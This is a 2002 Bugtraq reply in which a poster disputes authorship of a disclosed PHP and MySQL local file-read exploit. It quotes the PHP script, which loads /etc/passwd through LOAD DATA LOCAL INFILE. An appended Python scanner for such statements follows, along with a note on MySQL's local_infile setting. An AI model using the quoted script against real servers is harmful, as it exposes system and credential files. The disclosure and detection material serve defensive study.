
List:       bugtraq
Subject:    Re: File reading vulnerable in PHP and MySQL (Local Exploit)
From:       Dave Wilson <dw () botanicus ! net>
Date:       2002-11-27 9:54:58

Hi there,

Please see http://botanicus.net/dw/sec.html - I wrote about this in
February. Prior to that, other people have claimed to have come across
this too.

On Tue, Nov 26, 2002 at 10:57:52AM -0000, Hai Nam Luke wrote:

> Attacker can use PHP and mySQL to read some local file following this way:
> 
> # Create a database (mySQL) and upload this file to your server
> PHP Code: viewfile.php (programmed by Luke)
> 
> ======================================================
> <?
> // config this data
> $dbhost = "";
> $dbuser = "";
> $dbpasswd = "";
> $dbname = "";
> $file = "/etc/passwd"; // filename that you wanna view 
> 
> // shell code
> echo "<pre>";
> 
> mysql_connect ($dbhost, $dbuser, $dbpasswd);
> $sql = array (
>    "USE $dbname",
> 
>    'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
> 
>    "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
>    . "TERMINATED BY      '__THIS_NEVER_HAPPENS__' "
>    . "ESCAPED BY          '' "
>    . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
> 
>    "SELECT a FROM $tbl LIMIT 1"
> );


Umm, this is my code. Please check any good Bugtraq archive for proof of
this fact. This is pretty much identical, except my English is better
:-).

> Luke (HVA)
> http://www.hackervn.net

Dave Wilson.
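
For an administrator auditing PHP uploaded to a shared host, the scanner below (an added example, not code from either poster) flags the LOAD DATA LOCAL INFILE statement quoted above, including when it is split across concatenated string literals. The function name scan_php and the sample source are constructed for this illustration.

```python
import re

# LOAD DATA [LOW_PRIORITY | CONCURRENT] LOCAL INFILE '<target>'
LOAD_LOCAL = re.compile(
    r"LOAD\s+DATA\s+(?:(?:LOW_PRIORITY|CONCURRENT)\s+)?LOCAL\s+INFILE\s+"
    r"(['\"])(.*?)\1",
    re.IGNORECASE | re.DOTALL,
)
# A PHP concatenation joint between two string literals: "..." . "..."
JOINT = re.compile(r"""["']\s*\.\s*["']""")

# Constructed sample: line 2 follows the statement quoted in the thread,
# line 4 is a server-side load (no LOCAL), line 5 is split across literals.
SAMPLE = r"""<?php
$sql = "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
     . "TERMINATED BY ',' ";
$ok = "LOAD DATA INFILE '/srv/import/rows.csv' INTO TABLE t";
$split = 'LOAD DATA ' . 'LOCAL ' .
         "INFILE '/srv/import/rows.csv' INTO TABLE t";
"""


def scan_php(source):
    """Return (line, target, kind) for each LOAD DATA LOCAL INFILE statement."""
    # Splice adjacent literals together so a statement split over several
    # strings is seen whole; keep the newlines so line numbers stay valid.
    joined = JOINT.sub(lambda m: "\n" * m.group(0).count("\n"), source)
    findings = []
    for m in LOAD_LOCAL.finditer(joined):
        target = m.group(2)
        # A PHP variable in the path means the file is chosen at run time.
        kind = "dynamic" if "$" in target else "literal"
        line = joined.count("\n", 0, m.start()) + 1
        findings.append((line, target, kind))
    return findings


if __name__ == "__main__":
    for line, target, kind in scan_php(SAMPLE):
        print(f"line {line}: LOCAL INFILE target {target!r} ({kind})")
```

On the server side, MySQL's local_infile system variable controls whether LOCAL loads are accepted at all.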